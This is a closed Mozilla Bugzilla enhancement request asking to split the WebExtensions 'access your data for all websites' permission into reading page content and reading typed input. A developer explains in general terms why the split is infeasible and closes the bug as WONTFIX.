Closed Bug 1579644 Opened 6 years ago Closed 6 years ago

Separate APIs for reading page data vs reading what I type into the page

Categories

(WebExtensions :: Untriaged, enhancement)

Product:
WebExtensions
Component:
Untriaged
Version:
69 Branch
Type:
enhancement
Priority:
Not set
Severity:
normal

Tracking

(Not tracked)

Status:
RESOLVED WONTFIX

People

(Reporter: jonathan, Unassigned)

Details

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Steps to reproduce:

I tried to install Ghostery, an ad blocker that has good reviews. After selecting Ghostery, I checked the permissions, then the FireFox documentation for the requested permissions.

Actual results:

Ghostery asks for "Access your data for all websites" because it needs to read the website content to know what part of it is an ad to be blocked. However, the "Access your data for all websites" permission also grants an extension the permission to read all the data I enter into websites, such as my usernames and passwords (reference: https://support.mozilla.org/en-US/kb/permission-request-messages-firefox-extensions?as=u&utm_source=inproduct#w_access-your-data-for-all-websites).

Expected results:

To improve user privacy, these should be two separate permissions -- read website content, and read what I type into a website. Ad blockers only need to read website content, they don't need to know what I type into a website. Password managers need both (so they can detect form fields, automatically pick up a password I type and prompt me to save it).

Thanks for the report, let's triage this issue on the Webextensions component for a proper evaluation.

Product: Firefox → WebExtensions
Version: 69 Branch → Firefox 69

To improve user privacy, these should be two separate permissions -- read website content, and read what I type into a website. Ad blockers only need to read website content, they don't need to know what I type into a website. Password managers need both (so they can detect form fields, automatically pick up a password I type and prompt me to save it).

Unfortunately, it is not that simple. Implementing a split with a "read only content" mode would break virtually all extensions, including adblockers which need to modify pages in order to block certain elements. Any extension which is allowed to change the DOM would be able to read it by definition, but even we somehow manage prevent that, it could augment the page in a number of ways to exfiltrate user data.

Additionally, just observing web requests is more than enough to snoop on session cookies and access user's credentials that way.

In short, this is not a feasible solution, and we're instead focusing on other approaches to the privacy/security issues, namely: recommended extensions (which go through a more involved review process), more declarative APIs, and more specific host permissions handling (as part of the Google's manifest v3 work).

Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
Resolution: --- → WONTFIX
Version: Firefox 69 → 69 Branch
You need to log in before you can comment on or make changes to this bug.